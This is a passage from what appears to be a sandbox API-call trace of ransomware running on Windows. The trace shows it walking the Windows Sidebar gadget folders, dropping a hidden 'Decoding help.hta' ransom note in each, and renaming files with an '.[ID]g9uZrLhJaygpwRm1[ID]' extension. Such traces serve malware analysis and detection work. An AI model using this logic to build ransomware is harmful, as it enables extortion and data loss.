returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.699] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 64 [0048.699] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" [0048.699] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\decoding help.hta")) returned 0x1 [0048.699] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0048.699] lstrlenW (lpString="icon.png") returned 8 [0048.699] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.699] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 64 [0048.699] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" [0048.699] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" [0048.699] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.958] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805ee1db, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805ee1db, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0049.958] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0049.958] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0049.958] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0050.246] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0050.246] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 64 [0050.246] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images" [0050.246] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0050.246] GlobalMemoryStatus (in: lpBuffer=0x1d0dfd10 | out: lpBuffer=0x1d0dfd10) [0050.246] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94184c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x554 [0050.247] CloseHandle (hObject=0x554) returned 1 [0050.248] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x284ed995, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0050.250] lstrcpyW (in: lpString1=0x2512f920, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0050.250] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 64 [0050.250] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" [0050.250] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\decoding help.hta")) returned 0x1 [0050.250] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0050.250] lstrlenW (lpString="logo.png") returned 8 [0050.250] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0050.250] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 64 [0050.250] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" [0050.250] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" [0050.250] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.685] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0x1d0dfd30 | out: lpFindFileData=0x1d0dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x284ed995, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0051.685] FindClose (in: hFindFile=0x5da678 | out: hFindFile=0x5da678) returned 1 Thread: id = 444 os_tid = 0xb54 [0044.783] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*", lpFindFileData=0x1d21fd30 | out: lpFindFileData=0x1d21fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8950 [0049.246] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.246] FindNextFileW (in: hFindFile=0x5d8950, lpFindFileData=0x1d21fd30 | out: lpFindFileData=0x1d21fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.246] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.246] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.246] FindNextFileW (in: hFindFile=0x5d8950, lpFindFileData=0x1d21fd30 | out: lpFindFileData=0x1d21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8439c2bc, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8439c2bc, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2855fdaf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x5b85, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0049.620] lstrcpyW (in: lpString1=0x10d5eb58, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0049.620] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 61 [0049.620] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" [0049.620] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\decoding help.hta")) returned 0xffffffff [0049.620] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0052.143] WriteFile (in: hFile=0x374, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1d21fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1d21fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.973] CloseHandle (hObject=0x374) returned 1 [0055.309] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.065] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0058.065] lstrlenW (lpString="drag.png") returned 8 [0058.065] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0058.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 61 [0058.065] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" [0058.065] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" [0058.065] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.066] FindNextFileW (in: hFindFile=0x5d8950, lpFindFileData=0x1d21fd30 | out: lpFindFileData=0x1d21fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22eb1137, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0058.066] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0058.066] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0058.066] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0058.066] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0058.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 61 [0058.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US" [0058.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0058.066] GlobalMemoryStatus (in: lpBuffer=0x1d21fd10 | out: lpBuffer=0x1d21fd10) [0058.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a6cc28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x750 [0058.067] CloseHandle (hObject=0x750) returned 1 [0058.067] FindNextFileW (in: hFindFile=0x5d8950, lpFindFileData=0x1d21fd30 | out: lpFindFileData=0x1d21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285ac06b, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x285ac06b, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x285ac06b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2e0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0058.067] lstrcpyW (in: lpString1=0x10d5eb58, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0058.067] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 61 [0058.067] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" [0058.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\decoding help.hta")) returned 0x1 [0058.067] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0058.067] lstrlenW (lpString="icon.png") returned 8 [0058.067] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0058.067] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 61 [0058.067] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" [0058.067] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" [0058.067] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.068] FindNextFileW (in: hFindFile=0x5d8950, lpFindFileData=0x1d21fd30 | out: lpFindFileData=0x1d21fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x805c807b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x805c807b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0058.068] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0058.068] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0058.068] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0058.068] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0058.068] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 61 [0058.068] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images" [0058.068] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0058.068] GlobalMemoryStatus (in: lpBuffer=0x1d21fd10 | out: lpBuffer=0x1d21fd10) [0058.068] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5df89a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x750 [0058.069] CloseHandle (hObject=0x750) returned 1 [0058.069] FindNextFileW (in: hFindFile=0x5d8950, lpFindFileData=0x1d21fd30 | out: lpFindFileData=0x1d21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843c2419, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x843c2419, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28e73115, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0058.069] lstrcpyW (in: lpString1=0x10d5eb58, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0058.069] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 61 [0058.069] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" [0058.069] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\decoding help.hta")) returned 0x1 [0058.069] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0058.069] lstrlenW (lpString="logo.png") returned 8 [0058.069] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0058.069] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned 61 [0058.069] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" [0058.069] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" [0058.069] lstrcatW (in: 